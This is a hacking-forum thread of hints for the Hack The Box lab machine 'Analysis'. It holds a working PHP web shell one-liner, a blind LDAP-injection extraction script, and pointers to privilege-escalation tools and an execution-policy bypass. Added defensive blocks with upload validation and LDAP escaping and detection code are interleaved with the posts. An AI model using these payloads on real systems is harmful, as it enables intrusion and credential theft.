Analysis - HTB
by paven - Saturday January 20, 2024 at 01:22 PM
#51
Can anyone share a PHP shell payload?
Reply
#52
(Jan 21, 2024, 08:55 AM)D0rke1e Wrote: Can anyone share a PHP shell payload?

<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>

Put it into a .php file and upload it to the server through the SOC Report module.
Reply
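As an added example (not code from this thread, and not the actual upload check of the box's SOC Report module, which the posts do not describe), here is the kind of server-side validation that would refuse the one-liner above: an extension allowlist that also rejects executable extensions anywhere in the name (report.pdf.php, report.php.pdf), a magic-byte check against the declared type, and a scan for PHP open tags in the content. The accepted-types policy, the function name and the sample inputs are all assumptions.

```python
import re
from pathlib import PurePosixPath

# Assumed policy for a report-upload endpoint (hypothetical, not the real module's).
ALLOWED_EXTENSIONS = {".pdf", ".txt", ".csv"}
# Extensions a misconfigured web server may hand to the PHP interpreter; never allowed anywhere in a name.
EXECUTABLE_EXTENSIONS = {".php", ".php3", ".php4", ".php5", ".php7", ".phtml", ".phar", ".phps"}
MAGIC = {".pdf": b"%PDF-"}
# <?php, <?= and the short <? tag: any of them is enough for a one-line shell.
PHP_TAG_RE = re.compile(rb"<\?(?:php\b|=|\s)", re.IGNORECASE)


def validate_upload(filename: str, content: bytes):
    """Return (accepted, reason_or_safe_name) for one uploaded file."""
    name = PurePosixPath(filename).name  # drop any directory components the client sent
    suffixes = [s.lower() for s in PurePosixPath(name).suffixes]
    if not suffixes:
        return False, "no extension"
    # Check every suffix, not just the last one: report.php.pdf is as dangerous as shell.php
    if any(s in EXECUTABLE_EXTENSIONS for s in suffixes):
        return False, f"executable extension in {name}"
    ext = suffixes[-1]
    if ext not in ALLOWED_EXTENSIONS:
        return False, f"extension {ext} not allowed"
    magic = MAGIC.get(ext)
    if magic and not content.startswith(magic):
        return False, f"content is not a {ext} file"
    if PHP_TAG_RE.search(content):
        return False, "PHP open tag found in content"
    return True, name


if __name__ == "__main__":
    # Constructed sample uploads
    for fname, body in [
        ("report.pdf", b"%PDF-1.7\n% constructed sample"),
        ("shell.php", b"<?php system($_REQUEST['cmd']); ?>"),
        ("report.pdf.php", b"%PDF-1.7"),
        ("notes.txt", b"<?=1?>"),
    ]:
        print(fname, "->", validate_upload(fname, body))
```

The allowlist check alone is not enough: a text or CSV upload still has to be scanned for PHP tags, and the stored file should be served from a directory where the server does not execute scripts at all.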
#53
I am in, but how do I get to the user flag?
Reply
#54
https://github.com/antonioCoco/ConPtyShell I ran this tool, but it doesn't work properly. What can I do?
Reply
#55
How are you guys logging in (and where) using the technician password?
Reply
#56
(Jan 21, 2024, 09:50 AM)xlr Wrote: How are you guys logging in (and where) using the technician password?

Log on to the web portal, where you can use the SOC upload functionality to gain a foothold. Discussed thoroughly above.
Reply
#57
Could use a little hint... is /private/encoded.txt a rabbit hole?
If not, how do I deal with it?
Reply
#58
(Jan 21, 2024, 06:40 AM)qxuarpcy Wrote:
(Jan 21, 2024, 06:38 AM)jyosun Wrote:
(Jan 21, 2024, 06:30 AM)qxuarpcy Wrote:
(Jan 21, 2024, 06:09 AM)jyosun Wrote:
(Jan 21, 2024, 06:02 AM)qxuarpcy Wrote: Got user, any hint for root?

How did you get the user flag?

svc_web > webservice  > jdoe > user flag

I got some credentials for webservice, but I don't know how to use them. Can you give me a little more of a hint?

RunasCs

I got credentials and uploaded RunasCs.exe to the box. Using RunasCs I can read files as webservice... but I cannot find the jdoe credentials.
Reply
#59
code:

import requests
import urllib.parse

charset = "/usr/share/seclists/Fuzzing/alphanum-case-extra.txt"
url_template = "http://internal.analysis.htb/users/list.php?name=*)(%26(objectClass=user)(description={}*)"
clair = ""  # recovered prefix of the description attribute so far

while True:
    found = False
    with open(charset, "r") as charset_file:
        for char in charset_file.read():
            if char.isspace():  # the wordlist is one character per line; skip the newlines
                continue
            clair_with_char = clair + char
            clair_encoded = urllib.parse.quote(clair_with_char)
            s = url_template.format(clair_encoded)
            print("Trying URL:", s)
            response = requests.get(s)

            if "technic" in response.text:
                clair += char
                print(clair)
                found = True
                break  # restart the charset with the longer prefix
    if not found:
        # No character extended the prefix: stop instead of looping forever
        print("No character matched; result so far:", clair)
        break



When your code loops, try adding the char "*" manually.
Reply
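As an added example from the defender's side (not code from this thread or from the box), here is the other half of the picture: the filter construction that makes the character-by-character oracle above work, the RFC 4515 escaping that closes it, and a small detector that flags the oracle's traffic in web server logs. The filter shape in build_user_filter is an assumption about what a "list users by name" page might build, not the real list.php; the log lines are constructed, and 192.0.2.x and 198.51.100.x are documentation addresses.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# --- Mitigation: escape values before they enter an LDAP search filter (RFC 4515) ---
_LDAP_FILTER_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\0": r"\00"}


def escape_ldap_filter_value(value: str) -> str:
    """Escape the characters that have meaning inside an LDAP filter value."""
    return "".join(_LDAP_FILTER_ESCAPES.get(ch, ch) for ch in value)


def build_user_filter(name: str, escape: bool = True) -> str:
    """Filter a 'list users by name' page might build (assumed shape, not the real list.php).
    escape=False reproduces the raw string concatenation the injection relies on."""
    value = escape_ldap_filter_value(name) if escape else name
    return f"(&(objectClass=user)(cn={value}))"


# --- Detection: spot the oracle in combined-format web server logs ---
# Constructed sample; only the third client is doing blind, one-character-at-a-time extraction.
SAMPLE_LOG = [
    '192.0.2.10 - - [21/Jan/2024:10:57:01 +0000] "GET /users/list.php?name=jdoe HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.5 - - [21/Jan/2024:10:57:01 +0000] "GET /users/list.php?name=*)(objectClass=*) HTTP/1.1" 200 640 "-" "curl/8.0"',
    '192.0.2.77 - - [21/Jan/2024:10:57:02 +0000] "GET /users/list.php?name=*)(%26(objectClass=user)(description=t*) HTTP/1.1" 200 640 "-" "python-requests/2.31"',
    '192.0.2.77 - - [21/Jan/2024:10:57:03 +0000] "GET /users/list.php?name=*)(%26(objectClass=user)(description=te*) HTTP/1.1" 200 640 "-" "python-requests/2.31"',
    '192.0.2.77 - - [21/Jan/2024:10:57:04 +0000] "GET /users/list.php?name=*)(%26(objectClass=user)(description=tec*) HTTP/1.1" 200 640 "-" "python-requests/2.31"',
]

_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
# Sequences that close one filter component and open another; a real username never contains them.
_LDAP_META_RE = re.compile(r"\)\(|\(&|\(\||\*\)")


def is_ldap_injection_value(value: str) -> bool:
    return _LDAP_META_RE.search(value) is not None


def find_ldap_injection(log_lines, threshold=3):
    """Map client IP -> decoded query values carrying LDAP filter metacharacters,
    keeping only clients at or above `threshold` hits (a blind oracle needs many requests)."""
    hits = defaultdict(list)
    for line in log_lines:
        m = _LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        # parse_qs splits on the raw '&' first, so the encoded %26 survives into the value
        for values in parse_qs(query, keep_blank_values=True).values():
            for value in values:
                if is_ldap_injection_value(value):
                    hits[m.group("ip")].append(value)
    return {ip: values for ip, values in hits.items() if len(values) >= threshold}


if __name__ == "__main__":
    payload = "*)(&(objectClass=user)(description=te*)"
    print("vulnerable:", build_user_filter(payload, escape=False))
    print("escaped:   ", build_user_filter(payload))
    for ip, values in find_ldap_injection(SAMPLE_LOG).items():
        print(f"{ip}: {len(values)} injection-shaped requests, last guess {values[-1]!r}")
```

With escaping in place the whole payload becomes a literal cn value that matches nothing, so the response never changes and the oracle disappears. On the detection side the signal is the combination of filter metacharacters in a parameter and a client repeating the request many times with a slowly growing value; a single probe (198.51.100.5 above) stays below the threshold.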
#60
(Jan 21, 2024, 10:57 AM)bsbsmaster Wrote: I can't understand how you got the password for the user. I tried so many ways; any hint that might help me? I tried the script and brute force, and I tried to change the script URL; it didn't work.
If you got a shell, then you can do further enumeration to find the user credentials. It's the autologon functionality: saved Winlogon credentials.

Use this tool - https://github.com/itm4n/PrivescCheck - bypass the PowerShell execution policy restriction, run it, analyze the report it dumps... there you have it...
Reply

